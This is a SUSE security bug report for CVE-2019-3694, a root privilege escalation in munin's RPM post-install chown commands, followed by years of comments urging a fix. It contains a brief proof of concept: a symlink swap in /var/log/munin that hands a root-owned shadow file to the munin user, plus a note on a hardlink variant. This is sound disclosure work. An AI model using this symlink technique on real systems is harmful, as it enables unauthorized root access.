Bug 1155078 (CVE-2019-3694)

Summary: VUL-0: CVE-2019-3694: munin: LPE from munin to root
Product: [Novell Products] SUSE Security Incidents Reporter: Johannes Segitz <jsegitz>
Component: AuditsAssignee: Bernhard Wiedemann <bwiedemann>
Status: NEW --- QA Contact: Security Team bot <security-team>
Severity: Normal    
Priority: P3 - Medium CC: bwiedemann, jsegitz, meissner, wolfgang
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/245791/
Whiteboard:
Found By: --- Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---
Bug Depends on:    
Bug Blocks: 1154062    

Description Johannes Segitz 2019-10-25 09:16:45 UTC 
214 %post
215 chown -R munin:munin %{htmldir}
216 chown -R munin:munin %{dbdir}
217 chmod 755 %{dbdir}
218 touch %{logdir}/munin-graph.log %{logdir}/munin-html.log %{logdir}/munin-nagios.log %{logdir}/munin-limits.log %{logdir}/munin-update.log
219 chown munin:munin %{logdir}/*

allows LPE from munin to root. POC:
sh-5.0$ id
uid=463(munin) gid=462(munin) groups=462(munin)
sh-5.0$ pwd
/var/log/munin
sh-5.0$ rm munin-graph.log
sh-5.0$ ln -s /test/shadow munin-graph.log
sh-5.0$ ls -l
total 0
lrwxrwxrwx 1 munin munin 12 Oct 25 11:13 munin-graph.log -> /test/shadow
-rw-r--r-- 1 munin munin  0 Oct 25 11:12 munin-html.log
-rw-r--r-- 1 munin munin  0 Oct 25 11:12 munin-limits.log
-rw-r--r-- 1 munin munin  0 Oct 25 11:12 munin-nagios.log
-rw-r--r-- 1 root  root   0 Oct 25 11:12 munin-node.log
-rw-r--r-- 1 munin munin  0 Oct 25 11:12 munin-update.log
sh-5.0$ ls -l /test/
total 4
-r-------- 1 root root 1228 Oct 25 11:01 shadow

force reinstall of munin

sh-5.0$ ls -l /test/
total 4
-r-------- 1 munin munin 1228 Oct 25 11:13 shadow

The recursive chown calls can be exploited in a similar way with hardlinks on systems that have fs.protected_hardlinks=0
Comment 1 Johannes Segitz 2019-10-25 11:58:39 UTC 
Please use CVE-2019-3694 to track this. We can make this bug public at any time.
Comment 2 Johannes Segitz 2019-10-25 12:08:06 UTC 
similar issues in %post node
256 %post node
257 if [ $1 = 1 ]; then
258 /usr/sbin/munin-node-configure --shell | sh
259 fi
260 chown -R munin:munin %{dbdir}
261 chmod 755 %{dbdir}
262 touch %{logdir}/munin-node.log
263 chown munin:munin %{logdir}/*
264 chown root:root %{logdir}/munin-node.log*
265 chown -R nobody:nobody %{dbdir}/plugin-state/* >/dev/null 2>&1
Comment 3 Johannes Segitz 2019-12-19 09:55:27 UTC 
can you please have look? We want to make these issue public in the near future. Thank you
Comment 4 Johannes Segitz 2020-01-24 10:40:25 UTC 
Please submit for this
Comment 5 Johannes Segitz 2020-07-20 12:48:32 UTC 
ping, please have a look
Comment 6 Wolfgang Rosenauer 2020-07-24 06:18:16 UTC 
Do you have hints what the correct solution is?
Comment 7 Johannes Segitz 2020-07-24 08:21:50 UTC 
(In reply to Wolfgang Rosenauer from comment #6)
So the easiest solution would be to remove this snippets and have rpm create the files with proper permissions. 

For the log files that might be tricky since you don't want to overwrite them upon update. Doesn't munin create them if they're missing? If not you can use runuser to touch them as munin directly, that's safe
Comment 8 Johannes Segitz 2021-06-23 11:51:40 UTC 
Can you please submit for this? Feel free to reach out if you have questions.
Comment 9 Johannes Segitz 2022-12-12 12:27:39 UTC 
This has been open for a really long time. Can you please work on this? Otherwise I'll file a drop request next week
Comment 11 Johannes Segitz 2023-01-10 17:23:31 UTC 
There are new maintainers. @Wolfgang: Do you want to reassign this bug to them?